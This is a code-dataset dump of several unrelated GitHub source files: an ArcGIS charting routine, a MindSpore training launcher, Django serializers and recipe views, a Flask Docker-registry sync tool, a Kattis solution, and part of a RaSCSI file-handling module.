res:\n y.append(ele['values'][band])\n x.append(_to_datetime(ele['attributes'][x_var]))\n\n #if \"bandNames\" in raster.properties:\n # band = raster.properties.bandNames[band]\n\n if dimension_values ==[]:\n t1.append({\"y\":y,\n \"x\":x,\n \"point\": index,\n \"variable\":variable,\n \"band\":band})\n else:\n for ele in d1:\n t1.append({\"y\":ele[\"yy\"],\n \"x\":ele[\"xx\"],\n \"point\": index,\n \"variable\":variable,\n \"dimension_value\":ele[\"dimension_value\"],\n \"dimension\":dimension,\n \"band\":band})\n x=[]\n y=[]\n d1=[]\n\n if plot_properties is None:\n plot_properties = {}\n if len(plot_properties)==0 or (len(plot_properties)>0 and \"figsize\" not in plot_properties.keys()):\n plot_properties.update({\"figsize\":(15,15)})\n if plot_properties is not None and isinstance(plot_properties,dict):\n #{\"figsize\":(20,10),\"dpi\":100,\"facecolor\":\"yellow\",\"edgecolor\":\"blue\",\"linewidth\":10.0,\"frameon\":False}\n _plt.figure(**plot_properties)\n _plt.xlabel(x_var)\n if len(variables)==1:\n if variable_unit is not None:\n _plt.ylabel(variables[0] + ' (in '+variable_unit+')')\n else:\n _plt.ylabel(variables[0])\n else:\n _plt.ylabel(\"Values\")\n\n title_string = \"Change in\"\n for ele in variables:\n title_string=title_string+\" \"+str(ele+\",\")\n title_string=title_string+ \" over \"+x_var\n if dimension is not None and dimension_values is not None:\n title_string = title_string+ ','' at '+ str(dimension)+' = '+str(dimension_values)\n _plt.title(title_string)\n\n color=iter(_cm.rainbow(_np.linspace(0,1,len(t1))))\n for i in range(0,len(t1)):\n label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n if \"dimension\" in t1[i].keys():\n label_string = label_string+\"-\"+t1[i][\"dimension\"]+\"=\"+str(t1[i][\"dimension_value\"])\n if \"band\" in t1[i].keys():\n label_string = label_string+\"-\"+\"band = \"+str(t1[i][\"band\"])\n c=next(color)\n _plt.plot(t1[i][\"x\"],t1[i][\"y\"], c=c, label=label_string)\n _plt.scatter(t1[i][\"x\"],t1[i][\"y\"], c=[c])\n _plt.legend(loc='upper left')\n\n #for i in range(0,len(t1)):\n # label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n # if \"dimension\" in t1[i].keys():\n # label_string = label_string+\"-\"+t1[i][\"dimension\"]+\"=\"+str(t1[i][\"dimension_value\"])\n # plt.plot(t1[i][\"x\"],t1[i][\"y\"], label=label_string)\n # plt.scatter(t1[i][\"x\"],t1[i][\"y\"])\n # plt.legend(loc='upper left')\n #plt.gcf().autofmt_xdate()\n #print(t1[i][\"x\"],\" < \", t1[i][\"y\"])\n\n if trend_type is not None:\n date_list=[]\n for date in t1[i][\"x\"]:\n ole_date = _datetime2ole(date)\n date_list.append(ole_date)\n sample_size = len(date_list)\n if (sample_size != len(t1[i][\"y\"])):\n print(\"error\")\n if trend_type.lower() == \"linear\":\n x_trend, y_trend = _linear_regression(sample_size, date_list, t1[i][\"x\"], t1[i][\"y\"])\n elif trend_type.lower() == \"harmonic\":\n if trend_order is None:\n _LOGGER.warning(\"Trend line cannot be drawn. Please enter a trend order value from 1 to 3.\")\n if trend_order < 1:\n trend_order = 1\n _LOGGER.warning(\"Invalid Argument - trend order is less than 1. Setting trend order as 1 to plot the trend line\")\n if trend_order > 3:\n trend_order = 3\n _LOGGER.warning(\"Invalid Argument - trend order is greater than 3. Setting trend order as 3 to plot the trend line\")\n x_trend, y_trend = _harmonic_regression(sample_size, date_list, t1[i][\"x\"], t1[i][\"y\"], trend_order)\n _plt.plot(x_trend, y_trend,\"--g\")\n\n if show_values:\n for x,y in zip(t1[i][\"x\"],t1[i][\"y\"]):\n label = \"{:.2f}\".format(y)\n _plt.annotate(label, # this is the text\n (x,y), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(10,5), # distance from text to points (x,y)\n ha='center') \n\n _plt.show()\n #plt.legend()\n else:\n num_lines = len(points)*len(bands)\n #y=[[] for i in range(0, num_lines)]\n #x=[[] for i in range(0, num_lines)]\n t2=[]\n t1=[]\n xx=[]\n yy=[]\n d1=[]\n\n mosaic_rule = {\n \"mosaicMethod\" : \"esriMosaicAttribute\",\n \"ascending\" : False,\n \"sortField\": x_var\n }\n\n for index, point in enumerate(points):\n for variable in variables:\n t2 = raster.get_samples(geometry=point, return_first_value_only=False, out_fields=\"*\" ,mosaic_rule = mosaic_rule)\n #print(t2)\n #x_var = raster.properties.timeInfo['startTimeField']\n \n for band in bands:\n for element in t2: \n if \"attributes\" in element:\n if \"SensorName\" in element[\"attributes\"].keys():\n if variable.upper()==\"ALL_SENSORS\":\n if _time_filter(time_extent, _to_datetime(element[\"attributes\"][x_var])) == True:\n yy.append(element['values'][band])\n xx.append(_to_datetime(element[\"attributes\"][x_var]))\n xx, yy = zip(*sorted(zip(xx, yy)))\n xx=list(xx)\n yy=list(yy)\n if element[\"attributes\"][\"SensorName\"]==variable:\n if _time_filter(time_extent, _to_datetime(element[\"attributes\"][x_var])) == True:\n yy.append(element['values'][band])\n xx.append(_to_datetime(element[\"attributes\"][x_var]))\n xx, yy = zip(*sorted(zip(xx, yy)))\n xx=list(xx)\n yy=list(yy)\n\n d1.append({\"yy\":yy, \"xx\":xx, \"band\":band})\n yy=[]\n xx=[] \n for ele in d1:\n t1.append({\"y\":ele[\"yy\"],\n \"x\":ele[\"xx\"],\n \"point\": index,\n \"variable\" : variable,\n \"band\":ele[\"band\"]})\n d1=[]\n #print(t1)\n if plot_properties is None:\n plot_properties = {}\n if len(plot_properties)==0 or (len(plot_properties)>0 and \"figsize\" not in plot_properties.keys()):\n plot_properties.update({\"figsize\":(15,15)})\n if plot_properties is not None and isinstance(plot_properties,dict):\n #{\"figsize\":(20,10),\"dpi\":100,\"facecolor\":\"yellow\",\"edgecolor\":\"blue\",\"linewidth\":10.0,\"frameon\":False}\n _plt.figure(**plot_properties)\n #_plt.figure(figsize=(15,15))\n #_plt.figure()\n _plt.xlabel(x_var)\n _plt.ylabel(variable)\n if len(variables)==1:\n _plt.ylabel(variables[0])\n else:\n _plt.ylabel(\"Values\")\n title_string = \"Change in\"\n for ele in variables:\n title_string=title_string+\" \"+str(ele+\",\")\n title_string=title_string+ \" over \"+x_var\n _plt.title(title_string)\n color=iter(_cm.rainbow(_np.linspace(0,1,len(t1))))\n for i in range(0,len(t1)):\n label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n #label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"\n if \"band\" in t1[i].keys():\n label_string = label_string+\"-\"+\"band = \"+str(t1[i][\"band\"])\n c=next(color)\n _plt.plot(t1[i][\"x\"],t1[i][\"y\"], c=c, label=label_string)\n _plt.scatter(t1[i][\"x\"],t1[i][\"y\"], c=[c])\n _plt.legend(loc='upper left')\n \n if show_values:\n for x,y in zip(t1[i][\"x\"],t1[i][\"y\"]):\n label = \"{:.2f}\".format(y)\n _plt.annotate(label, # this is the text\n (x,y), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(10,5), # distance from text to points (x,y)\n ha='center') \n #_plt.gcf().autofmt_xdate()\n _plt.show()\n\n","repo_name":"chrimerss/FloodDetectionUsingSAR","sub_path":"env/lib/python3.6/site-packages/arcgis/raster/_charts.py","file_name":"_charts.py","file_ext":"py","file_size_in_byte":20758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"11525752466","text":"import os\nimport sys\nimport subprocess\nimport shutil\nfrom argparse import ArgumentParser\n\ndef parse_args():\n \"\"\"\n parse args .\n\n Args:\n\n Returns:\n args.\n\n Examples:\n >>> parse_args()\n \"\"\"\n parser = ArgumentParser(description=\"mindspore distributed training launch \"\n \"helper utilty that will spawn up \"\n \"multiple distributed processes\")\n parser.add_argument(\"--nproc_per_node\", type=int, default=1,\n help=\"The number of processes to launch on each node, \"\n \"for D training, this is recommended to be set \"\n \"to the number of D in your system so that \"\n \"each process can be bound to a single D.\")\n parser.add_argument(\"--visible_devices\", type=str, default=\"0,1,2,3,4,5,6,7\",\n help=\"will use the visible devices sequentially\")\n parser.add_argument(\"--training_script\", type=str,\n help=\"The full path to the single D training \"\n \"program/script to be launched in parallel, \"\n \"followed by all the arguments for the \"\n \"training script\")\n # rest from the training program\n args, unknown = parser.parse_known_args()\n args.training_script_args = unknown\n return args\n\n\ndef main():\n print(\"start\", __file__)\n args = parse_args()\n print(args)\n visible_devices = args.visible_devices.split(',')\n assert os.path.isfile(args.training_script)\n assert len(visible_devices) >= args.nproc_per_node\n print('visible_devices:{}'.format(visible_devices))\n\n # spawn the processes\n processes = []\n cmds = []\n log_files = []\n env = os.environ.copy()\n env['RANK_SIZE'] = str(args.nproc_per_node)\n cur_path = os.getcwd()\n for rank_id in range(0, args.nproc_per_node):\n os.chdir(cur_path)\n device_id = visible_devices[rank_id]\n device_dir = os.path.join(cur_path, 'device{}'.format(rank_id))\n env['RANK_ID'] = str(rank_id)\n env['DEVICE_ID'] = str(device_id)\n if os.path.exists(device_dir):\n shutil.rmtree(device_dir)\n os.mkdir(device_dir)\n os.chdir(device_dir)\n cmd = [sys.executable, '-u']\n cmd.append(args.training_script)\n cmd.extend(args.training_script_args)\n log_file = open('{dir}/log{id}.log'.format(dir=device_dir, id=rank_id), 'w')\n process = subprocess.Popen(cmd, stdout=log_file, stderr=log_file, env=env)\n processes.append(process)\n cmds.append(cmd)\n log_files.append(log_file)\n for process, cmd, log_file in zip(processes, cmds, log_files):\n process.wait()\n if process.returncode != 0:\n raise subprocess.CalledProcessError(returncode=process, cmd=cmd)\n log_file.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gerayking/mindsporeAno","sub_path":"model_zoo/official/cv/mobilenetv2/src/launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17702759112","text":"from rest_framework import serializers\nfrom matricula.models import Curso, MatriculaCurso, PeriodoAcademico\nfrom usuarios.serializers import ProfesorSerializer, AlumnoSerializer\nfrom asignaturas.serializers import AsignaturaSerializer\n\n\nclass PeriodoAcademicoSerializer(serializers.ModelSerializer):\n class Meta:\n model = PeriodoAcademico\n fields = ('id',\n 'nombre',\n 'fecha_inicio',\n 'fecha_fin')\n\n\nclass CursoSerializer(serializers.ModelSerializer):\n periodo_academico = PeriodoAcademicoSerializer(read_only=True)\n asignatura = AsignaturaSerializer(read_only=True)\n profesor = ProfesorSerializer(read_only=True)\n\n class Meta:\n model = Curso\n fields = ('id',\n 'grupo',\n 'profesor',\n 'asignatura',\n 'periodo_academico',\n 'cupo')\n\n\nclass CursoSerializerPost(serializers.ModelSerializer):\n\n class Meta:\n model = Curso\n fields = ('id',\n 'grupo',\n 'profesor',\n 'asignatura',\n 'periodo_academico',\n 'cupo')\n\n\nclass MatriculaSerializer(serializers.ModelSerializer):\n curso = CursoSerializer(read_only=True)\n alumno = AlumnoSerializer(read_only=True)\n\n class Meta:\n model = MatriculaCurso\n fields = ('id',\n 'calificacion',\n 'curso',\n 'alumno')\n\n\nclass MatriculaSerializerPost(serializers.ModelSerializer):\n\n class Meta:\n model = MatriculaCurso\n fields = ('id',\n 'calificacion',\n 'curso',\n 'alumno')","repo_name":"eduard-arango11/BackMatricula","sub_path":"matricula/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21627958695","text":"# -*- coding: utf-8 -*-\nimport requests\nimport yaml\nimport json\n\nfrom log import log\nfrom flask import Flask, jsonify, request, send_from_directory\n\nfrom DockerRegistry import DockerRegistry\nfrom DockerClient import DockerClient\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n\napi = Flask(__name__)\n\n\ndef init_vars():\n global src_reg, dst_reg, docker_cli\n try:\n src_reg = DockerRegistry(cfg['src_registry']['ADDRESS'], cfg['src_registry']['USERNAME'],\n cfg['src_registry']['PASSWORD'])\n dst_reg = DockerRegistry(cfg['dst_registry']['ADDRESS'], cfg['dst_registry']['USERNAME'],\n cfg['dst_registry']['PASSWORD'])\n\n docker_cli = DockerClient()\n docker_cli.login(src_reg.ADDRESS, src_reg.USERNAME, src_reg.PASSWORD)\n docker_cli.login(dst_reg.ADDRESS, dst_reg.USERNAME, dst_reg.PASSWORD)\n except requests.exceptions.RequestException as e:\n print('docker registry connection error', e)\n\n\nsrc_reg = dst_reg = DockerRegistry()\ndocker_cli = DockerClient\n\ninit_vars()\n\n\n@api.route('/', defaults={'path': ''})\n@api.route('/')\ndef get_resource(path):\n if not path or path == 'settings':\n path = 'index.html'\n return send_from_directory('client/build', path)\n\n\n@api.route('/static/js/')\ndef send_js(path):\n return send_from_directory('client/build/static/js', path)\n\n\n@api.route('/static/css/')\ndef send_css(path):\n return send_from_directory('client/build/static/css', path)\n\n\n# http сервис должен уметь:\n# список имеджей на деве\n@api.route('/api/images/src', methods=['GET'])\ndef get_src_images():\n images = src_reg.images_list()\n return jsonify(images)\n\n\n# список имеджей на проде\n@api.route('/api/images/dst', methods=['GET'])\ndef get_dst_images():\n images = dst_reg.images_list()\n return jsonify(images)\n\n\n# перенос с одного сервера на другой\n@api.route('/api/move/to_/', methods=['POST'])\ndef move(server):\n req = request.get_json()\n image = req['image']\n\n pull_server = dst_reg.ADDRESS\n push_server = src_reg.ADDRESS\n if server == 'dst':\n pull_server = src_reg.ADDRESS\n push_server = dst_reg.ADDRESS\n\n src_repo, src_tag = image.split(':')\n\n move_image(pull_server, push_server, src_repo, src_tag)\n\n return 'OK'\n\n\ndef move_image(pull_server, push_server, src_repo, src_tag):\n # скачиваем с дева по соурс тегу\n pulled_image_id = docker_cli.pull_image(pull_server, src_repo, src_tag)\n pulled_image = docker_cli.get_image(pulled_image_id)\n\n # меняем в теге урл на прод\n new_tag = src_tag\n new_repo = push_server + '/' + src_repo\n\n pulled_image.tag(repository=new_repo, tag=new_tag)\n\n # пушим на проду\n docker_cli.push_image(new_repo, new_tag)\n\n # удаляем локальный имейдж\n docker_cli.remove_image(pulled_image_id)\n\n\n@api.route('/api/check_if_can_be_removed/', methods=['POST'])\ndef check_if_can_be_removed(server):\n req = request.get_json()\n\n if 'images' not in req \\\n or req['images'].__len__() < 1:\n return ''\n\n docker_reg = src_reg\n if server == 'dst':\n docker_reg = dst_reg\n\n response = {}\n for image in req['images']:\n src_repo, src_tag = image.split(':')\n duplicates = docker_reg.check_if_can_be_removed(src_repo, src_tag)\n if duplicates.__len__() < 1:\n continue\n\n response[image] = duplicates\n\n return jsonify(response)\n\n# удаление с любого из\n@api.route('/api/remove//', methods=['POST'])\ndef remove(server):\n req = request.get_json()\n\n if 'image' not in req or not req['image']:\n return ''\n\n src_image = req['image']\n\n docker_reg = src_reg\n if server == 'dst':\n docker_reg = dst_reg\n\n response = {\n 'status': 'ok'\n }\n\n src_repo, src_tag = src_image.split(':')\n\n result = docker_reg.remove_image(src_repo, src_tag)\n\n if not result:\n response = {\n 'status': 'error',\n }\n\n return jsonify(response)\n\n\ndef filter_tags(images):\n res = list()\n for image_name, tags in images.items():\n if cfg['repositories'].__len__() > 0 \\\n and cfg['repositories'][0] != '' \\\n and image_name not in cfg['repositories']:\n continue\n for prefix in cfg['prefixes']:\n for tag in tags:\n if not tag.startswith(prefix):\n continue\n res.append({\n 'name': image_name,\n 'tag': tag\n })\n\n return res\n\n\n@api.route('/api/get_settings', methods=['GET'])\ndef get_settings():\n return jsonify(cfg)\n\n\n@api.route('/api/save_settings', methods=['POST'])\ndef save_settings():\n new_cfg = request.get_json()\n global cfg\n\n with open(\"config.yml\", 'w+') as cfgfile:\n yaml.dump(new_cfg, cfgfile)\n\n print(log('configs changed, prev configs:'\n + json.dumps(cfg)\n + ', new configs:'\n + json.dumps(new_cfg)))\n\n cfg = new_cfg\n init_vars()\n\n return 'Ok'\n\n\n# метод синхронизации всех докер имеджей\n@api.route('/api/synchronize/', methods=['GET'])\ndef synchronize():\n # получаем список имеджей слева\n src_images = src_reg.images_list()\n # получаем список имеджей справа\n dst_images = dst_reg.images_list()\n # вытаскиваем только нужные, основываясь на префиксах тегов\n src_images = filter_tags(src_images)\n dst_images = filter_tags(dst_images)\n # создаем список лишних на проде\n excess_images = [item for item in dst_images if item not in src_images]\n # сносим лишние\n for excess_image in excess_images:\n dst_reg.remove_image(excess_image['name'], excess_image['tag'])\n\n # создаем список недостающих на проде\n missing_images = [item for item in src_images if item not in dst_images]\n # переносим недостающие\n for missing_image in missing_images:\n move_image(src_reg.ADDRESS, dst_reg.ADDRESS, missing_image['name'], missing_image['tag'])\n\n return 'OK'\n\n\nif __name__ == \"__main__\":\n api.run(port=8000)\n","repo_name":"Epimetheus84/DRS_manager","sub_path":"app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22165708458","text":"from math import *\r\n\r\ndef golden(a0, b0, f, tol):\r\n gr = (5**0.5-1)/2\r\n t, a, b = 0, a0, b0\r\n while b - a > tol:\r\n λ, μ = gr*a + (1-gr)*b, (1-gr)*a + gr*b\r\n if f(μ) > f(λ): b = μ\r\n else: a = λ\r\n t += 1\r\n return (a+b)/2\r\n\r\ndef time(c):\r\n return n*(log2(n))**(c*sqrt(2))/(p*1e9) + s*(1+1/c)/v\r\n\r\nn, p, s, v = map(float, input().split())\r\nopt_c = golden(0.1, 100, time, 1e-9)\r\nprint(time(opt_c), opt_c)","repo_name":"RussellDash332/kattis","sub_path":"src/Euclidean TSP/euclideantsp.py","file_name":"euclideantsp.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"2389901834","text":"from django.db.models import Sum\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom djoser.views import UserViewSet\nfrom recipes.models import (Favorite, Ingredient, Recipe, RecipeIngredient,\n ShoppingСart, Tag)\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom users.models import Subscription, User\n\nfrom .filters import IngredientFilter, RecipeFilter\nfrom .pagination import LimitPagination\nfrom .permissions import IsAdminOrOwnerOrReadOnly, IsAdminOrReadOnly\nfrom .serializers import (CreateRecipeSerializer, CustomUserCreateSerializer,\n CustomUserSerializer, IngredientSerializer,\n RecipeSerializer, SubscriptionCreateSerializer,\n SubscriptionSerializer, TagSerializer)\n\nFILENAME = 'shopping_cart.txt'\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение и создание рецептов.\n Добавление в избранное, в список покупок.\n \"\"\"\n queryset = Recipe.objects.all()\n pagination_class = LimitPagination\n filter_backends = (DjangoFilterBackend,)\n filterset_class = RecipeFilter\n\n def get_permissions(self):\n \"\"\"Определение права доступа для запросов.\"\"\"\n if self.action in (\n 'create', 'favorite', 'shopping_cart', 'download_shopping_cart'\n ):\n self.permission_classes = (IsAuthenticated, )\n elif self.action in ('partial_update', 'destroy'):\n self.permission_classes = (IsAdminOrOwnerOrReadOnly, )\n elif self.action in ('list', 'retrieve'):\n self.permission_classes = (AllowAny, )\n return super().get_permissions()\n\n def get_serializer_class(self):\n \"\"\"Определение класса сериалайзера.\"\"\"\n if self.action in ('create', 'partial_update'):\n return CreateRecipeSerializer\n return RecipeSerializer\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def favorite(self, request, pk):\n \"\"\"Добавление рецепта в избранное/удаление из избранного\"\"\"\n return self.add_delete_recipe(\n model=Favorite,\n pk=pk,\n method=request.method,\n )\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def shopping_cart(self, request, pk):\n \"\"\"Добавление/удаление рецепта в корзину/из корзины\"\"\"\n return self.add_delete_recipe(\n model=ShoppingСart,\n pk=pk,\n method=request.method,\n )\n\n def add_delete_recipe(self, model, pk, method):\n \"\"\"Вспомогательная функция для добавления/удаления\n рецепта в избранное/ корзину.\"\"\"\n user = self.request.user\n recipe = get_object_or_404(Recipe, pk=pk)\n if method == \"POST\":\n obj = model.objects.get_or_create(user=user, recipe=recipe)\n if obj[1] is False:\n raise ValidationError('Рецепт уже был добавлен.')\n return Response(\n {'Рецепт добавлен.'}, status=status.HTTP_201_CREATED\n )\n if method == \"DELETE\":\n obj = model.objects.filter(user=user, recipe=recipe).delete()\n if obj[0] == 0:\n raise ValidationError('Рецепт уже был удален/не был добавлен.')\n return Response(\n {'Рецепт удален.'}, status=status.HTTP_204_NO_CONTENT\n )\n\n @action(detail=False, methods=['GET'],)\n def download_shopping_cart(self, request):\n \"\"\"Формирование списка покупок.\"\"\"\n ingredients_to_buy = (\n RecipeIngredient.objects.filter(\n recipe__shopping_cart__user=request.user).values(\n \"ingredient__name\",\n \"ingredient__measurement_unit\",\n ).annotate(total_amount=Sum(\"amount\"))\n )\n shopping_cart = []\n shopping_cart.append(f\"Список покупок юзера {request.user.username}\\n\")\n for i in ingredients_to_buy:\n name = i[\"ingredient__name\"]\n amount = i[\"total_amount\"]\n measurement_unit = i[\"ingredient__measurement_unit\"]\n shopping_cart.append(f\"{name} ({measurement_unit}) - {amount}\")\n shopping_list = \"\\n\".join(shopping_cart)\n response = HttpResponse(\n shopping_list, content_type=\"text/plain,charset=utf8\"\n )\n response['Content-Disposition'] = f'attachment; filename={FILENAME}'\n return response\n\n\nclass IngredientViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение ингредиентов.\"\"\"\n queryset = Ingredient.objects.all()\n serializer_class = IngredientSerializer\n permission_classes = (IsAdminOrReadOnly, )\n filter_backends = (DjangoFilterBackend,)\n filterset_class = IngredientFilter\n\n\nclass TagViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение тегов.\"\"\"\n queryset = Tag.objects.all()\n serializer_class = TagSerializer\n permission_classes = (IsAdminOrReadOnly,)\n\n\nclass CustomUserViewSet(UserViewSet):\n \"\"\"Отображение пользователей. Подписка и ее отмена.\"\"\"\n queryset = User.objects.all()\n pagination_class = LimitPagination\n\n def get_serializer_class(self):\n \"\"\"Определение класса сериалайзера.\"\"\"\n if self.action in ('create', 'partial_update'):\n return CustomUserCreateSerializer\n return CustomUserSerializer\n\n def get_permissions(self):\n \"\"\"Определение права доступа для запросов.\"\"\"\n if self.action in ('subscribe', 'subscriptions'):\n self.permission_classes = (IsAuthenticated, )\n elif self.action in ('partial_update', 'destroy'):\n self.permission_classes = (IsAdminOrOwnerOrReadOnly, )\n elif self.action in ('create', 'list', 'retrieve'):\n self.permission_classes = (AllowAny, )\n return super().get_permissions()\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def subscribe(self, request, id):\n \"\"\"Создание/удаление подписки на пользователя.\"\"\"\n data = {'subscriber': request.user.id, 'author': id}\n serializer = SubscriptionCreateSerializer(\n data=data, context={'request': request}\n )\n if request.method == \"POST\":\n serializer.is_valid(raise_exception=True)\n serializer.save(user=request.user)\n return Response(\n serializer.data,\n status=status.HTTP_201_CREATED\n )\n if request.method == 'DELETE':\n subscription = Subscription.objects.filter(\n subscriber=request.user, author__id=id\n )\n obj = subscription.delete()\n if obj[0] == 0:\n raise ValidationError('Вы не подписаны на этого пользовател��.')\n return Response(\n {'Вы отменили подписку на пользователя'},\n status=status.HTTP_204_NO_CONTENT\n )\n\n @action(detail=False, methods=[\"GET\"])\n def subscriptions(self, request):\n \"\"\"Просмотр подписок.\"\"\"\n subscriptions = User.objects.filter(\n subscribers__subscriber=self.request.user\n )\n paginator = LimitPagination()\n result_page = paginator.paginate_queryset(subscriptions, request)\n serializer = SubscriptionSerializer(\n result_page, many=True, context={\"request\": request}\n )\n return paginator.get_paginated_response(serializer.data)\n","repo_name":"marinamurina/foodgram-project-react","sub_path":"foodgram/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70835823160","text":"\"\"\"\nModule for methods reading from and writing to the file system\n\"\"\"\n\nimport os\nimport logging\nfrom pathlib import PurePath\nfrom flask import current_app, session\nfrom flask_babel import _\n\nfrom ractl_cmds import (\n get_server_info,\n get_reserved_ids,\n attach_image,\n detach_all,\n list_devices,\n reserve_scsi_ids,\n)\nfrom pi_cmds import run_async\nfrom socket_cmds import send_pb_command\nfrom settings import CFG_DIR, CONFIG_FILE_SUFFIX, PROPERTIES_SUFFIX, RESERVATIONS\nimport rascsi_interface_pb2 as proto\n\n\ndef list_files(file_types, dir_path):\n \"\"\"\n Takes a (list) or (tuple) of (str) file_types - e.g. ('hda', 'hds')\n Returns (list) of (list)s files_list:\n index 0 is (str) file name and index 1 is (int) size in bytes\n \"\"\"\n files_list = []\n for path, dirs, files in os.walk(dir_path):\n # Only list selected file types\n files = [f for f in files if f.lower().endswith(file_types)]\n files_list.extend(\n [\n (\n file,\n os.path.getsize(os.path.join(path, file))\n )\n for file in files\n ]\n )\n return files_list\n\n\ndef list_config_files():\n \"\"\"\n Finds fils with file ending CONFIG_FILE_SUFFIX in CFG_DIR.\n Returns a (list) of (str) files_list\n \"\"\"\n files_list = []\n for root, dirs, files in os.walk(CFG_DIR):\n for file in files:\n if file.endswith(\".\" + CONFIG_FILE_SUFFIX):\n files_list.append(file)\n return files_list\n\n\ndef list_images():\n \"\"\"\n Sends a IMAGE_FILES_INFO command to the server\n Returns a (dict) with (bool) status, (str) msg, and (list) of (dict)s files\n\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.DEFAULT_IMAGE_FILES_INFO\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n\n # Get a list of all *.properties files in CFG_DIR\n prop_data = list_files(PROPERTIES_SUFFIX, CFG_DIR)\n prop_files = [PurePath(x[0]).stem for x in prop_data]\n\n from zipfile import ZipFile, is_zipfile\n server_info = get_server_info()\n files = []\n for file in result.image_files_info.image_files:\n # Add properties meta data for the image, if applicable\n if file.name in prop_files:\n process = read_drive_properties(f\"{CFG_DIR}/{file.name}.{PROPERTIES_SUFFIX}\")\n prop = process[\"conf\"]\n else:\n prop = False\n if file.name.lower().endswith(\".zip\"):\n zip_path = f\"{server_info['image_dir']}/{file.name}\"\n if is_zipfile(zip_path):\n zipfile = ZipFile(zip_path)\n # Get a list of (str) containing all zipfile members\n zip_members = zipfile.namelist()\n # Strip out directories from the list\n zip_members = [x for x in zip_members if not x.endswith(\"/\")]\n else:\n logging.warning(\"%s is an invalid zip file\", zip_path)\n zip_members = False\n else:\n zip_members = False\n\n size_mb = \"{:,.1f}\".format(file.size / 1024 / 1024)\n dtype = proto.PbDeviceType.Name(file.type)\n files.append({\n \"name\": file.name,\n \"size\": file.size,\n \"size_mb\": size_mb,\n \"detected_type\": dtype,\n \"prop\": prop,\n \"zip_members\": zip_members,\n })\n\n return {\"status\": result.status, \"msg\": result.msg, \"files\": files}\n\n\ndef create_new_image(file_name, file_type, size):\n \"\"\"\n Takes (str) file_name, (str) file_type, and (int) size\n Sends a CREATE_IMAGE command to the server\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.CREATE_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"file\"] = file_name + \".\" + file_type\n command.params[\"size\"] = str(size)\n command.params[\"read_only\"] = \"false\"\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef delete_image(file_name):\n \"\"\"\n Takes (str) file_name\n Sends a DELETE_IMAGE command to the server\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.DELETE_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"file\"] = file_name\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef rename_image(file_name, new_file_name):\n \"\"\"\n Takes (str) file_name, (str) new_file_name\n Sends a RENAME_IMAGE command to the server\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.RENAME_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"from\"] = file_name\n command.params[\"to\"] = new_file_name\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef delete_file(file_path):\n \"\"\"\n Takes (str) file_path with the full path to the file to delete\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n if os.path.exists(file_path):\n os.remove(file_path)\n return {\n \"status\": True,\n \"msg\": _(u\"File deleted: %(file_path)s\", file_path=file_path),\n }\n return {\n \"status\": False,\n \"msg\": _(u\"File to delete not found: %(file_path)s\", file_path=file_path),\n }\n\n\ndef rename_file(file_path, target_path):\n 